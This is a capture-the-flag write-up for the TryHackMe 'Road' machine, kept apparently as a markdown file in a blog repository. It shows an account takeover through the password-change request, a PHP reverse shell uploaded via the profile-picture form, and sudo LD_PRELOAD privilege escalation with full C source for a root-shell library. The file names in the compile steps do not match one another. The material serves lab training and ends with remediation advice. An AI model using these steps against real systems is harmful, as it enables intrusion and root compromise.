d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-road-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

156 lines
4.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - Road (THM)"
date: 2022-04-08
slug: "writeup-road-thm"
type: "writeup-ctf"
---
This is a writeup for the [Road](https://tryhackme.com/room/road) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.57.115
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2p1)
- 80/tcp : HTTP web server (Apache 2.4.41)
![](img/image-2.webp)
## Exploit
I start with an enumeration of the files of the website.
![](img/image-3.webp)
I find a button on the basic site page that redirects to a login page. We have the possibility to create an account, I start by doing that.
![](img/image-4.webp)
Once the account is created, I log in and see the following page:
![](img/image-5.webp)
In the `edit profil` section you can't modify anything except the profile picture, but after looking closer, a message indicates that only the admins can do this action... Except that we learn an important information: the email of the admin!
![](img/image-6.webp)
After some research on the site, I find another page. This page allows you to change your password. I make a password change and capture the request sent to the server with Burp.
![](img/image-7.webp)
I realize that the email of the account is sent during the validation of the form, so I try to send the request but changing my email for the admin one. The server does not return any error, so I can connect to the admin account of the site!
![](img/image-8.webp)
Now that I'm admin, I can upload a new profile picture!
![](img/image-9.webp)
So I create a PHP reverse shell with the following template:
[php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellContribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.![](https://github.com/fluidicon.png)
{{< github repo="pentestmonkey/php-reverse-shell" >}}
I upload my `reverse.php` file thanks to the profile image change form. No error during the upload, I just have to find where the file has been put on the server..
I look at the source code of the page to see if there would not be any information. I find the following comment:
![](img/image-10.webp)
So I go to the following address:
```bash
10.10.57.115/v2/profileimages/reverse.php
```
![](img/image-11.webp)
I now have a reverse shell and can recover the first flag.
```bash
$ cat /home/webdeveloper/user.txt
63191e4ece37523c9fe6bb62a5e64d45
```
## Privilege escalation
I start by running [linPeas](https://linpeas.sh). In the result of the command I find that Mysql and MangoDB are running on the machine...
I upgrade my shell with the following command:
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
Then I try to connect to MySQL without success, so I test with MongoDB :
![](img/image-12.webp)
I am now in Mongo, I list the databases with the following command:
![](img/image-13.webp)
After a little exploration, I find in the `backup` database a table `user` :
![](img/image-14.webp)
I can now connect via SSH to webdeveloper. I then check if this user has SUDO authorization:
![](img/image-15.webp)
The `webdeveloper` user can execute the `sky_backup_utility` with root rights. But the most interesting thing is the tag: `env_keep+=LD_PRELOAD`.
After some research I found this website:
[Sudo (LD_PRELOAD) (Linux Privilege Escalation) Touhids Blog](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/)
Overall, it explains that it is possible to execute code before the program and that with root execution rights. So I create a bash.c file with the following content :
```C
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
```
bash.cThen I compile it with the following command:
```bash
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
```
I can now run the program with sudo, without forgetting our code that will be executed at the beginning:
```bash
sudo LD_PRELOAD=/home/webdeveloper/bash.so sky_backup_utility
```
![](img/image-16.webp)
I now have a root shell so I can get the last flag.
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Secured the password change page to prevent a user from changing the password of a user other than his own
- Set up a verification of the upload files to the server to avoid sending PHP code or other
- Do not store passwords in clear text in a database
- Secure access to databases
- Do not change SETUID bit of a program to avoid `LD_PRELOAD` exploit
Reference in New Issue View Git Blame Copy Permalink